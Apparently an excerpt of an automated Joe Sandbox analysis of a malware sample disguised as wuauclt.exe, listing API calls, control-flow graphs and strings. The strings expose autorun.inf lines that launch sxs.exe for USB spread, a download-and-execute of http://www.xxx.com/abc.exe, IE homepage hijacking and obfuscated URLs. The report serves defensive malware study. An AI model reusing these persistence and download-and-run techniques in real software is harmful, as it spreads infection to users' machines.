                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
                                                                            • Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D
                                                                            Function 0040554C Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile$CacheDownloadEntryFindSleepWindow
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w$t
                                                                            • API String ID: 2925464748-437854802
                                                                            • Opcode ID: 55d769b00b4cc51311f16a0815c2c7d4af7c3a2c72f53d4aaf0d0fdfd5a223a3
                                                                            • Instruction ID: fce2701fde403f0fd4f63779a484b59778674d3ae0df84e1f7a0fac326dad310
                                                                            • Opcode Fuzzy Hash: 55d769b00b4cc51311f16a0815c2c7d4af7c3a2c72f53d4aaf0d0fdfd5a223a3
                                                                            • Instruction Fuzzy Hash: F9811D70611205ABDB00FBA5D986A8E7BB9EF45708F10447BF540BB2E3CA78AD058B5D
                                                                            Function 004055D8 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 192filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
                                                                            • API String ID: 4037061717-2671944630
                                                                            • Opcode ID: bd639567ac3fd4388e3c6bd4f9e15b5f878b9b5c2a586539b18f924d682a37e1
                                                                            • Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
                                                                            • Opcode Fuzzy Hash: bd639567ac3fd4388e3c6bd4f9e15b5f878b9b5c2a586539b18f924d682a37e1
                                                                            • Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D
                                                                            Function 00408BD4 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 133filewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
                                                                            • PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
                                                                            • SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
                                                                            • DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
                                                                            • String ID: bbyb$open$wuauclt.exe
                                                                            • API String ID: 2051752798-429206649
                                                                            • Opcode ID: c8b33bf48d59ee998beae567223aa1bd64577581beb50e728ef37f833824f42e
                                                                            • Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
                                                                            • Opcode Fuzzy Hash: c8b33bf48d59ee998beae567223aa1bd64577581beb50e728ef37f833824f42e
                                                                            • Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D
                                                                            Function 004081E8 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 128filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
                                                                            • String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
                                                                            • API String ID: 1217617683-1617324073
                                                                            • Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
                                                                            • Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D
                                                                            Function 00405D7C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 127filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
                                                                            • String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
                                                                            • API String ID: 2803323816-32510556
                                                                            • Opcode ID: d9c88504475ae06a2b29dbf263fa6e981639584f9090797de8e2b9f35afcf763
                                                                            • Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
                                                                            • Opcode Fuzzy Hash: d9c88504475ae06a2b29dbf263fa6e981639584f9090797de8e2b9f35afcf763
                                                                            • Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D
                                                                            Function 023118DB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107registryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 023118F7
                                                                            • RegOpenKeyExA.KERNEL32(80000000,Applications\iexplore.exe\shell\open\command,00000000,00000001,?), ref: 02311911
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0231192B
                                                                            • RegCloseKey.KERNEL32(?), ref: 02311985
                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02311996
                                                                            • ReadFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 023119B6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 023119C0
                                                                            Strings
                                                                            • C:\Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 02311968
                                                                            • Applications\iexplore.exe\shell\open\command, xrefs: 0231190B
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
                                                                            • Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFile$CreateDirectoryHandleOpenQueryReadValueWindows
                                                                            • String ID: Applications\iexplore.exe\shell\open\command$C:\Program Files\Internet Explorer\IEXPLORE.EXE
                                                                            • API String ID: 418526577-3772566379
                                                                            • Opcode ID: 282a74c037d5d51c532906bfb234d1f3ba97972be5e22b44c2930ed54938e901
                                                                            • Instruction ID: 7b3771a9e41e720791278f0a49b4f8e1d4c5d844510b33ae445245ab7f572dc6
                                                                            • Opcode Fuzzy Hash: 282a74c037d5d51c532906bfb234d1f3ba97972be5e22b44c2930ed54938e901
                                                                            • Instruction Fuzzy Hash: 17318EB190025DBFEB158E54DC84AEE7BBCFB05794F1044A6F699E6144D7309E80CBA0
                                                                            Function 00407BEC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 94sleepfilenetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
                                                                            • String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
                                                                            • API String ID: 1899506612-3830082169
                                                                            • Opcode ID: f6eaab7f91693ff3efbc4c5876b9fa1064e68bbbba0d4e86af0a7e17e86c47a2
                                                                            • Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
                                                                            • Opcode Fuzzy Hash: f6eaab7f91693ff3efbc4c5876b9fa1064e68bbbba0d4e86af0a7e17e86c47a2
                                                                            • Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E
                                                                            Function 00408A20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1084 408a20-408a82 LoadIconA LoadCursorA RegisterClassA 1085 408b10-408b12 1084->1085 1086 408a88-408aba call 404414 1084->1086 1086->1085 1089 408abc-408add SetTimer 1086->1089 1090 408aeb-408af9 GetMessageA 1089->1090 1091 408afb-408b0b KillTimer 1090->1091 1092 408adf-408ae6 TranslateMessage DispatchMessageA 1090->1092 1091->1085 1092->1090
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F51,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction ID: 3bba51ca83177c78f7b5e7647297d040befd782e8eab32064d4fce7d17e62b12
                                                                            • Opcode Fuzzy Hash: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction Fuzzy Hash: 82213EB0780701AFD720EF659D42F1736E8AB44704F10593EBA45FB6D2DBB8A8118B5C
                                                                            Function 0040288C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1093 40288c-4028a0 1094 4028a2-4028a3 1093->1094 1095 4028ad-4028c3 1093->1095 1096 4028c5-4028d4 1094->1096 1097 4028a5-4028a6 1094->1097 1098 4028ec-4028fe 1095->1098 1103 4028e5 1096->1103 1101 4028d6-4028e0 1097->1101 1102 4028a8 1097->1102 1099 402904-40291c CreateFileA 1098->1099 1100 4029b6-4029d3 1098->1100 1104 402922-40292a 1099->1104 1105 402a2a-402a35 GetLastError 1099->1105 1107 4029d5-4029d7 1100->1107 1108 4029d9-4029df 1100->1108 1101->1103 1106 402a14-402a15 1102->1106 1103->1098 1112 402930-40293e GetFileSize 1104->1112 1113 4029f3-4029f9 1104->1113 1105->1106 1109 4029e7-4029ef GetStdHandle 1107->1109 1110 4029e1-4029e3 1108->1110 1111 4029e5 1108->1111 1109->1105 1115 4029f1 1109->1115 1110->1109 1111->1109 1112->1105 1114 402944-402949 1112->1114 1116 402a12 1113->1116 1117 4029fb-402a04 GetFileType 1113->1117 1118 40294b 1114->1118 1119 40294d-40295a SetFilePointer 1114->1119 1115->1113 1116->1106 1120 402a16-402a28 CloseHandle 1117->1120 1121 402a06-402a09 1117->1121 1118->1119 1119->1105 1122 402960-40297c ReadFile 1119->1122 1120->1106 1121->1116 1123 402a0b 1121->1123 1122->1105 1124 402982 1122->1124 1123->1116 1125 402984-402986 1124->1125 1125->1113 1126 402988-402990 1125->1126 1127 402992-402993 1126->1127 1128 402995-4029a4 SetFilePointer 1126->1128 1127->1125 1128->1105 1129 4029aa-4029b2 SetEndOfFile 1128->1129 1129->1105 1130 4029b4 1129->1130 1130->1113
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 004029E7
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 004029FD
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402A30
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
